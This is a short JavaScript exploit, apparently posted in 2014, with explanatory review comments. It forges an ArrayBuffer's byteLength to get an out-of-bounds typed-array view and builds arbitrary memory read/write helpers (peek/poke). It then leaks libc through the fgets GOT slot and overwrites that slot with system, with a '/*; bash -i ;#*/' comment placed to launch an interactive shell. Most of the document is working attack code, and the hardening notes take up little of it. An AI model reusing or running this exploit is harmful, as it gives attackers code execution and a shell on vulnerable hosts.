
Created June 1, 2014 18:37
// An ordinary 8-byte buffer: a Uint32Array over it should legitimately
// expose only two 32-bit elements.
var ab1 = new ArrayBuffer(8);
/**
 * Render a value as a base-16 string (lowercase digits, no "0x" prefix).
 * Debug helper; nothing else in this listing calls it.
 *
 * @param {number} n - value to format
 * @returns {string} hexadecimal representation of `n`
 */
function hex(n) {
  var HEX_RADIX = 16;
  var text = n.toString(HEX_RADIX);
  return text;
}
// Shadow the buffer's byteLength with a script-defined getter that reports
// 0xFFFFFFFC (just under 4 GiB) instead of the real 8 bytes.
// NOTE(review): this only matters on an engine that sizes typed-array views
// from the script-visible property rather than the buffer's internal length;
// a conforming engine ignores the getter and the view below has 2 elements.
ab1.__defineGetter__("byteLength", function() { return 0xFFFFFFFC; });
// 32-bit view over ab1. Everything below indexes it far past element 1, so the
// script presumes the view's bounds followed the forged length above.
var view = new Uint32Array(ab1);
// Hard-coded absolute addresses. NOTE(review): they look specific to one build
// of the target process (a fixed, non-randomized image is presumed); the name
// suggests the GOT slot for fgets — confirm against the original target.
var fgets_got = 0x91680A8;
var warning_addr = 0x0857E400; // 0x5761726e ("Warn" in ASCII); not referenced again in this listing
// view[18] lies beyond the 8 real bytes of ab1, so this reads memory adjacent
// to the buffer. The value minus 0x2e28 is then treated as the address of view
// element 0 (peek/poke subtract it from absolute addresses).
// NOTE(review): index 18 and offset 0x2e28 depend on the target's memory
// layout and cannot be verified from this file.
var my_buf = view[18] - 0x2e28
/**
 * Return the 32-bit word that `view` exposes for the address `addr`.
 *
 * The address is converted to a byte distance from `my_buf` (the presumed
 * address of view element 0), wrapped modulo 2^32 when the target lies below
 * it, and divided by 4 to obtain the element index. This returns data only
 * when `view` is not bounded by its 8-byte backing buffer; on a correctly
 * bounded view any index past element 1 reads `undefined`.
 *
 * @param {number} addr - address to read, expected to be 4-byte aligned
 *   relative to `my_buf` (a fractional index reads `undefined`)
 * @returns {number|undefined} the word at that index of `view`
 */
function peek(addr) {
  var delta = addr - my_buf;
  // Targets below my_buf give a negative distance; wrap into 32-bit range.
  var wrapped = delta < 0 ? delta + 0x100000000 : delta;
  var index = wrapped / 4;
  return view[index];
}
/**
 * Store the 32-bit value `val` in the element of `view` that corresponds to
 * the address `addr`.
 *
 * The index is derived exactly as in peek(): byte distance from `my_buf`,
 * wrapped modulo 2^32 when negative, divided by 4. The store reaches memory
 * outside the 8-byte buffer only when `view` is not bounded by it; this
 * unchecked write is the dangerous primitive a bounds fix must remove.
 *
 * @param {number} addr - address to write, expected to be 4-byte aligned
 *   relative to `my_buf`
 * @param {number} val - value stored (a Uint32Array truncates it to 32 bits)
 * @returns {undefined}
 */
function poke(addr, val) {
  var delta = addr - my_buf;
  // Targets below my_buf give a negative distance; wrap into 32-bit range.
  var wrapped = delta < 0 ? delta + 0x100000000 : delta;
  var index = wrapped / 4;
  view[index] = val;
}
// Read the word currently stored at fgets_got and subtract a fixed offset to
// derive a base address; a second fixed offset is then added to it.
// NOTE(review): 0x64660 and 0x403b0 are presumably symbol offsets within one
// specific libc build; they are not portable and cannot be checked from here.
var libc_base = peek(fgets_got) - 0x64660;
var system = libc_base + 0x403b0;
// Overwrite the word at fgets_got with the computed address, so later calls
// through that slot are redirected. The leading block comment is inert to
// JavaScript. NOTE(review): its shell-like text suggests this source line is
// itself expected to be handed to the redirected call; confirm against the
// target. Hardening relevant to this pattern: if fgets_got is a GOT slot, a
// read-only GOT (full RELRO) faults this write, and deriving view bounds from
// the buffer's internal length removes the read/write primitives entirely.
/*; bash -i ;#*/poke(fgets_got, system);